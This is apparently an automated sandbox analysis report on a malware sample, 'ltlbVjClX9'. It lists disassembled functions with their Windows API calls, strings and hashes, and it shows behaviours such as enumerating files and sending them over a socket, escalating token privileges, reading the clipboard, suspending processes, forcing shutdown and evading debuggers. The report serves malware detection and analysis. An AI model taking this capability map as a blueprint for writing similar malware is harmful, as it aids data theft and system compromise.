Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: b11a3aedaf17351664c96e6427e66266c8d14657d9b7ea2d978588b32b6ea3eb
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: b11a3aedaf17351664c96e6427e66266c8d14657d9b7ea2d978588b32b6ea3eb
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Function 02182877 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

Part of subcall function 0217847C: _free.LIBCMT ref: 021784DB
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784E8

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 02182983
IsValidCodePage.KERNEL32(00000000), ref: 021829DE
IsValidLocale.KERNEL32(?,00000001), ref: 021829ED
GetLocaleInfoW.KERNEL32(?,00001001,02174CD3,00000040,?,02174DF3,00000055,00000000,?,?,00000055,00000000), ref: 02182A35
GetLocaleInfoW.KERNEL32(?,00001002,02174D53,00000040), ref: 02182A54

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 737b4c0eecdb4003b078a87e682d6810d00b0522fd51fec3859bd7e923ac4946
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: FD518D72E40256AFEF22FFA5CC84ABA77B9AF48710F140469ED14E7190EB709940CF61

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 681c3c7d7f784295bbafca37fd4506271dde95ffc1a20a4dbb6145b2cbb0cd70
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 681c3c7d7f784295bbafca37fd4506271dde95ffc1a20a4dbb6145b2cbb0cd70
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Function 0213C5B4 Relevance: 7.6, APIs: 5, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00466C64,00000000), ref: 0213C602
FindNextFileW.KERNEL32(00000000,?), ref: 0213C6D5
FindClose.KERNEL32(00000000), ref: 0213C6E4
FindClose.KERNEL32(00000000), ref: 0213C70F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 3ccf6e67d80f64ddb744e131debf3226b82535af27f86310ca5df7612ec054b8
Instruction ID: b928b9979c9280af4a11e3cb03fddd6662b7d0199ad5b65e7e1df38ca2aa308d
Opcode Fuzzy Hash: 3ccf6e67d80f64ddb744e131debf3226b82535af27f86310ca5df7612ec054b8
Instruction Fuzzy Hash: E43153729802196ECF16F7B4EC99DEE777BAF40710F00005AE506A3190EF749E49CE99

Function 02147BB9 Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 02147BC6
OpenProcessToken.ADVAPI32(00000000), ref: 02147BCD
LookupPrivilegeValueA.ADVAPI32(00000000,0046C7C8,?), ref: 02147BDF
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02147BFE
GetLastError.KERNEL32 ref: 02147C04

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3534403312-0
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 02146A20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96libraryloadershutdownCOMMON

Download Yara Rule

APIs

ExitWindowsEx.USER32(00000000,00000001), ref: 02146ABD
LoadLibraryA.KERNEL32(0046C770,0046C760,00000000,00000000,00000000), ref: 02146AD2
GetProcAddress.KERNEL32(00000000), ref: 02146AD9

Strings

!D@, xrefs: 021472F0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcWindows
String ID: !D@
API String ID: 1366546845-604454484
Opcode ID: ef44ec02c7dff1212cb7eb77a939c95298a925e769e88fd2bdf0c1fa100c86bc
Instruction ID: 3a576d7419d608ec487fb6b53859e150d5a2ea6ed433fc77000e67fe087190ee
Opcode Fuzzy Hash: ef44ec02c7dff1212cb7eb77a939c95298a925e769e88fd2bdf0c1fa100c86bc
Instruction Fuzzy Hash: DD2185606C4352AECE25F7B08C58ABE725B9B51708F504C29AA469B185EF36DC09CA36

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 00407877
XPG, xrefs: 0040793A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: 94fe5ba20911370c00588a8cf12ecdc60dba89d54263ae5fa9e590e9bfa74937
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: 94fe5ba20911370c00588a8cf12ecdc60dba89d54263ae5fa9e590e9bfa74937
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

TileWallpaper, xrefs: 0041CAC1
WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Function 0217351C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,PkGNG,021734F2,00000003,0046E948,0000000C,02173649,00000003,00000002,00000000,PkGNG,0217639D,00000003), ref: 0217353D
TerminateProcess.KERNEL32(00000000), ref: 02173544
ExitProcess.KERNEL32 ref: 02173556

Strings

PkGNG, xrefs: 0217351E

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: PkGNG
API String ID: 1703294689-263838557
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 136942332d2da1bd13e9f81e20c26208b11c5b1ce24b007f9dbf41d9b08d5d7c
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: CFE0B631190248FFCF556F54DD08A983B7AFB80782F0544A4F9158A532CB35DE42EA44

Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
TerminateProcess.KERNEL32(00000000), ref: 004432DD
ExitProcess.KERNEL32 ref: 004432EF

Strings

PkGNG, xrefs: 004432B7

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: PkGNG
API String ID: 1703294689-263838557
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

Function 02181F3F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02174CDA,?,?,?,?,02174731,?,00000004), ref: 02182021
_wcschr.LIBVCRUNTIME ref: 021820B1
_wcschr.LIBVCRUNTIME ref: 021820BF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02174CDA,00000000,02174DFA), ref: 02182162

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 1bd206cf415602a3b7036cb6ca72631c5ad2637c3f1fa1c48d4355494c7afd75
Instruction ID: c66fa64a42cd0ca296b260da363f048e793b43f634817c2ae1526826931fad79
Opcode Fuzzy Hash: 1bd206cf415602a3b7036cb6ca72631c5ad2637c3f1fa1c48d4355494c7afd75
Instruction Fuzzy Hash: C761F472680246AED725BB75CCC5FBA73A9EF04710F24046AED19DB180EB70E945DF60

Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 004461F2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85

Function 0213FA0E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 021437B0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 021437D0
Part of subcall function 021437B0: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 021437EE
Part of subcall function 021437B0: RegCloseKey.ADVAPI32(00000000), ref: 021437F9

Sleep.KERNEL32(00000BB8), ref: 0213FAC2
ExitProcess.KERNEL32 ref: 0213FB31

Strings

pth_unenc, xrefs: 0213FA24, 0213FA6B, 0213FAD8

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: pth_unenc
API String ID: 2281282204-4028850238
Opcode ID: a00c0d6f4b11954cac67f4722a182c55ec6637cda691128a66fb69074ebbaeb8
Instruction ID: ed5dcc7bc694d8ab54c87a546de650ee5fd1a7033ee6f4e55a86e56655f05428
Opcode Fuzzy Hash: a00c0d6f4b11954cac67f4722a182c55ec6637cda691128a66fb69074ebbaeb8
Instruction Fuzzy Hash: 6C212821FC42002FD60A76B88C5AA6E359B7BC1B10F604559FC1A972D9EF74CE054FA7

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Function 0216BD89 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0216BE81
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0216BE8B
UnhandledExceptionFilter.KERNEL32(?), ref: 0216BE98

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: 6018f08ebf4eebb26550d1c70e9ba6f984b3760242181ddd01317d50b870faea
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E731D374941228DBCB21DF68D98879CBBB8FF08310F5041EAE80CA7290EB709B918F55

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Function 02163A9E Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,02163824,00000024,?,?,?), ref: 02163AB0
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02163AC6
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 02163AD8

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: b3fdbe7fce3a9818af02a77f68f290dc430b78d27f58c09f58d3934a2fce794e
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 40E09231348310FBEB348F11AC0CF6B3AA4EB81F65F210978F522E40E4D7538810D618

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Function 0214BD70 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,02146266,00000000), ref: 0214BD7B
NtSuspendProcess.NTDLL(00000000), ref: 0214BD88
CloseHandle.KERNEL32(00000000,?,?,02146266,00000000), ref: 0214BD91

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction ID: 3edb14670b7496fb0db8447cb41e97a381e6d916be0cd3edc893176f159bfdb9
Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction Fuzzy Hash: 8DD05E36604221E3C320176A7C0CD67AD69EBC59A27054169F808C21509B20CC01C6A4

Function 0214BD9C Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0214628B,00000000), ref: 0214BDA7
NtResumeProcess.NTDLL(00000000), ref: 0214BDB4
CloseHandle.KERNEL32(00000000,?,?,0214628B,00000000), ref: 0214BDBD

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction ID: 1c206b0948ff9403ac2af97fd34b79d70103ea7e5bc89c1d0e5176d51ef995d1
Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction Fuzzy Hash: F8D05E36504121E3C220176A7C0CD57AD68EFC59B27054169F808C21609B30CC01C6B4

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32(0000000D), ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
